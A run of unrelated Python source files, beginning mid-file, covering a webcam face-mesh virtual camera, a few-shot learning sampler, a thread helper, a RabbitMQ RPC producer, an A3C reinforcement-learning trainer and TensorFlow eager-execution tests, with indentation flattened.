height = int(vcam.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps_in = vcam.get(cv2.CAP_PROP_FPS)
print(f'Webcam capture started ({width}x{height} @ {fps_in}fps)') # Prints fps of vcam
###### CUSTOM CHANGES CAN BE MADE HERE #######
images=['Images/mask1.png','Images/mask2.png','Images/mask3.png','Images/mask4.png']
mask_img = cv2.imread(images[0],cv2.IMREAD_UNCHANGED) #### Change this Image to any Eye wear of your choice
colorsavailable=[(255,255,255),(0,255,255),(0,0,255),(255,0,255),(0,0,255),(0,0,0),(100,20,100),(208, 253, 255)]
chooseColor=colorsavailable[0]
bgColor=colorsavailable[6]
##############################################
fps_out = 20
with pyvirtualcam.Camera(width, height, fps_out, fmt=PixelFormat.BGR, print_fps=fps_in) as cam:
print(f'Virtual cam started: {cam.device} ({cam.width}x{cam.height} @ {cam.fps}fps)')
while True:
ret, frame = vcam.read()
faces=face_cascade.detectMultiScale(frame, 1.2, 5, 0, (120, 120), (350, 350)) #Detecting face using face cascade
if not ret:
raise RuntimeError('Error fetching frame')
# Send to virtual cam.
img = np.zeros((480,640,3), dtype=np.uint8)
img.fill(255)
img = np.full((480, 640, 3), bgColor, np.uint8) # Making a plain canvas with specific solid color
face_mesh = mp_face_mesh.FaceMesh(
static_image_mode=True,
max_num_faces=1,
min_detection_confidence=0.5)
results = face_mesh.process(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)) # Landmarks stored here
drawing_spec = mp_drawing.DrawingSpec(color=chooseColor,thickness=1, circle_radius=0)
if not results.multi_face_landmarks:
continue
for face_landmarks in results.multi_face_landmarks:
#print('face_landmarks:', face_landmarks)
mp_drawing.draw_landmarks(
image=img,
landmark_list=face_landmarks,
connections=mp_face_mesh.FACE_CONNECTIONS,
landmark_drawing_spec=drawing_spec,
connection_drawing_spec=drawing_spec)
for ids,landmrk in enumerate(face_landmarks.landmark):
#print(landmrk,ids)
# 25 is for left eye and 339 is for right eye
if ids == 25:
#cv2.putText(img, str(ids), (int(landmrk.x*640),int(landmrk.y*480)), cv2.FONT_HERSHEY_SIMPLEX,0.1, (255,0,255), 1, cv2.LINE_AA)
x1=landmrk.x*640
y1=landmrk.y*480
if ids == 339:
x2=landmrk.x*640
y2=landmrk.y*480
# getting size of canvas and mask image used
hf,wf,cf=img.shape
hb,wb,cb=mask_img.shape
mask_img=cv2.resize(mask_img, (int(x2-x1)+100, int(y2-y1)+100),interpolation=cv2.INTER_AREA)
#try and except used because it causes error when head is not detected
try:
img = cv.overlayPNG(img,mask_img,[int(x1)-40,int(y1)-70])
except:
pass
# Retrieve the detected text from takesinput process
fh = open("Utils/words.txt","r")
text=fh.read()
fh.close()
text = "Captions : " + text
# Place it on canvas
img = cv2.putText(img, str(text), (20,400), cv2.FONT_HERSHEY_SIMPLEX,0.5, (0,0,255), 1, cv2.LINE_AA)
#cv2.imshow("image", img)
cam.send(img)
if cv2.waitKey(1) == ord('q'):
break
# Wait until it's time for the next frame.
cam.sleep_until_next_frame()
# Running 2 processes using multiprocessing
p1 = multiprocessing.Process(target=takesinput)
p2 = multiprocessing.Process(target=program)
if __name__ == '__main__':
p1.start() # Starting both process
p2.start()
|
parallel_sampler.py
|
import time
import datetime
from multiprocessing import Process, Queue, cpu_count
import torch
import numpy as np
# from pytorch_transformers import BertModel
from transformers import BertModel
import dataset.utils as utils
import dataset.stats as stats
class ParallelSampler():
def __init__(self, data, args, num_episodes=None, DA=None):
self.data = data
self.args = args
self.num_episodes = num_episodes
self.DA = DA
self.all_classes = np.unique(self.data['label'])
self.num_classes = len(self.all_classes)
if self.num_classes < self.args.way:
raise ValueError("Total number of classes is less than #way.")
self.idx_list = []
for y in self.all_classes:
self.idx_list.append(
np.squeeze(np.argwhere(self.data['label'] == y)))
self.count = 0
self.done_queue = Queue()
self.num_cores = cpu_count() if args.n_workers is 0 else args.n_workers
self.p_list = []
for i in range(self.num_cores):
self.p_list.append(
Process(target=self.worker, args=(self.done_queue,)))
for i in range(self.num_cores):
self.p_list[i].start()
def get_epoch(self):
for _ in range(self.num_episodes):
# wait until self.thread finishes
support, query = self.done_queue.get()
# convert to torch.tensor
support = utils.to_tensor(support, self.args.cuda, ['raw'])
query = utils.to_tensor(query, self.args.cuda, ['raw'])
if self.args.meta_w_target:
if self.args.meta_target_entropy:
w = stats.get_w_target(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
else: # use rr approxmation (this one is faster)
w = stats.get_w_target_rr(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
support['w_target'] = w.detach()
query['w_target'] = w.detach()
support['is_support'] = True
query['is_support'] = False
yield support, query
def worker(self, done_queue):
'''
Generate one task (support and query).
Store into self.support[self.cur] and self.query[self.cur]
'''
while True:
if done_queue.qsize() > 100:
time.sleep(1)
continue
# sample ways
sampled_classes = np.random.permutation(
self.num_classes)[:self.args.way]
source_classes = []
for j in range(self.num_classes):
if j not in sampled_classes:
source_classes.append(self.all_classes[j])
source_classes = sorted(source_classes)
# sample examples
support_idx, query_idx = [], []
for y in sampled_classes:
tmp = np.random.permutation(len(self.idx_list[y]))
support_idx.append(
self.idx_list[y][tmp[:self.args.shot]])
query_idx.append(
self.idx_list[y][
tmp[self.args.shot:self.args.shot+self.args.query]])
support_idx = np.concatenate(support_idx)
query_idx = np.concatenate(query_idx)
if self.args.mode == 'finetune' and len(query_idx) == 0:
query_idx = support_idx
# aggregate examples
max_support_len = np.max(self.data['text_len'][support_idx])
max_query_len = np.max(self.data['text_len'][query_idx])
support_DA = self.DA if self.args.use_support_DA else None
query_DA = self.DA if self.args.use_query_DA else None
support = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
support_idx, max_support_len, support_DA, self.args.aug_mode)
query = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
query_idx, max_query_len, query_DA, self.args.aug_mode)
if self.args.embedding in ['idf', 'meta', 'meta_mlp']:
# compute inverse document frequency over the meta-train set
idf = stats.get_idf(self.data, source_classes)
support['idf'] = idf
query['idf'] = idf
if self.args.embedding in ['iwf', 'meta', 'meta_mlp']:
# compute SIF over the meta-train set
iwf = stats.get_iwf(self.data, source_classes)
support['iwf'] = iwf
query['iwf'] = iwf
if 'pos' in self.args.auxiliary:
support = utils.select_subset(
self.data, support, ['head', 'tail'], support_idx)
query = utils.select_subset(
self.data, query, ['head', 'tail'], query_idx)
done_queue.put((support, query))
def __del__(self):
'''
Need to terminate the processes when deleting the object
'''
for i in range(self.num_cores):
self.p_list[i].terminate()
del self.done_queue
|
threads.py
|
import threading
class crackcoinThreader(object):
""" Threading class for crackcoin """
def __init__(self):
self.threads = []
def startBackgroundThread(self, method, args = False):
''' Start new thread '''
if args:
newThread = threading.Thread(target=method, args=args)
else:
newThread = threading.Thread(target=method)
newThread.start()
self.threads.append(newThread)
def waitForThreads(self, timeout = 10.00):
''' Send stop signal to threads and wait for them to end '''
for thread in self.threads:
thread.join(timeout)
|
rpc_queue_producer.py
|
#!/usr/bin/env python
import pika
import uuid
import os
import time
import threading
import logging
MQ_HOST = os.environ.get('MQ_HOST')
class RpcProducer(object):
def __init__(self, timeout):
self.logger = logging.getLogger(__name__)
self.connection = pika.BlockingConnection(
pika.ConnectionParameters(host=MQ_HOST))
self.channel = self.connection.channel()
self.timeout = timeout
self.exchange_name = ''
t1 = threading.Thread(target=self.keep_live, args=())
t1.start()
result = self.channel.queue_declare(queue='', exclusive=True)
self.callback_queue = result.method.queue
self.channel.basic_consume(queue=self.callback_queue,
on_message_callback=self.on_response,
auto_ack=True)
def keep_live(self):
while True:
time.sleep(30)
msg = "[MQ]: Heart Beat"
self.logger.debug("Sending heart beat msg.")
self.call(msg)
def on_response(self, ch, method, props, body):
if self.corr_id == props.correlation_id:
self.response = body
def call(self, body):
# if not self.connection or self.connection.is_closed:
# # print("Reopening connection...")
# self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=MQ_HOST))
# self.channel = self.connection.channel()
# # print("Connection reopened.")
# # channel.exchange_declare(exchange=self.exchange_name)
self.response = None
self.corr_id = str(uuid.uuid4())
self.channel.basic_publish(exchange='',
routing_key='rpc_queue',
properties=pika.BasicProperties(
reply_to=self.callback_queue,
correlation_id=self.corr_id,
),
body=str(body))
timer = 0
while self.response is None:
time.sleep(1)
timer += 1
if timer == self.timeout:
return "No response from MQ receiver"
self.connection.process_data_events()
# self.channel.close()
return self.response
if __name__ == "__main__":
rpc = RpcProducer()
body = "test body"
print("Published Message: {}".format(body))
response = rpc.call(body)
print(" [.] Got response: " + str(response))
|
A3C.py
|
"""
Asynchronous Advantage Actor Critic (A3C), Reinforcement Learning.
The BipedalWalker example.
Using:
tensorflow
gym
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
GAME = 'BipedalWalker-v2'
OUTPUT_GRAPH = False
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_GLOBAL_EP = 8000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.99
ENTROPY_BETA = 0.005
LR_A = 0.00005 # learning rate for actor
LR_C = 0.0001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high]
del env
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self._build_net()
self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.float32, [None, N_A], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
mu, sigma, self.v = self._build_net()
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('wrap_a_out'):
self.test = sigma[0]
mu, sigma = mu * A_BOUND[1], sigma + 1e-5
normal_dist = tf.contrib.distributions.Normal(mu, sigma)
with tf.name_scope('a_loss'):
log_prob = normal_dist.log_prob(self.a_his)
exp_v = log_prob * td
entropy = normal_dist.entropy() # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('choose_a'): # use local params to choose action
self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1)), *A_BOUND)
with tf.name_scope('local_grad'):
self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self):
w_init = tf.contrib.layers.xavier_initializer()
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 500, tf.nn.relu6, kernel_initializer=w_init, name='la')
l_a = tf.layers.dense(l_a, 300, tf.nn.relu6, kernel_initializer=w_init, name='la2')
mu = tf.layers.dense(l_a, N_A, tf.nn.tanh, kernel_initializer=w_init, name='mu')
sigma = tf.layers.dense(l_a, N_A, tf.nn.softplus, kernel_initializer=w_init, name='sigma')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 500, tf.nn.relu6, kernel_initializer=w_init, name='lc')
l_c = tf.layers.dense(l_c, 300, tf.nn.relu6, kernel_initializer=w_init, name='lc2')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
return mu, sigma, v
def update_global(self, feed_dict): # run by a local
_, _, t = SESS.run([self.update_a_op, self.update_c_op, self.test], feed_dict) # local grads applies to global net
return t
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
s = s[np.newaxis, :]
return SESS.run(self.A, {self.s: s})
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME)
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
while True:
if self.name == 'W_0' and total_step % 30 == 0:
self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
if r == -100: r = -2
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
test = self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
achieve = '| Achieve' if self.env.unwrapped.hull.position[0] >= 88 else '| -------'
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.95 * GLOBAL_RUNNING_R[-1] + 0.05 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
achieve,
"| Pos: %i" % self.env.unwrapped.hull.position[0],
"| RR: %.1f" % GLOBAL_RUNNING_R[-1],
'| EpR: %.1f' % ep_r,
'| var:', test,
)
GLOBAL_EP += 1
break
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
import matplotlib.pyplot as plt
plt.plot(GLOBAL_RUNNING_R)
plt.xlabel('episode')
plt.ylabel('global running reward')
plt.show()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return array_ops.identity(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegex(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = array_ops.identity(1.0)
with ops.device('cpu:0'):
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('GPU:0'):
x = array_ops.identity(1.0)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:GPU:0')
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, current_device())
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegex(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
cpu.__exit__()
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
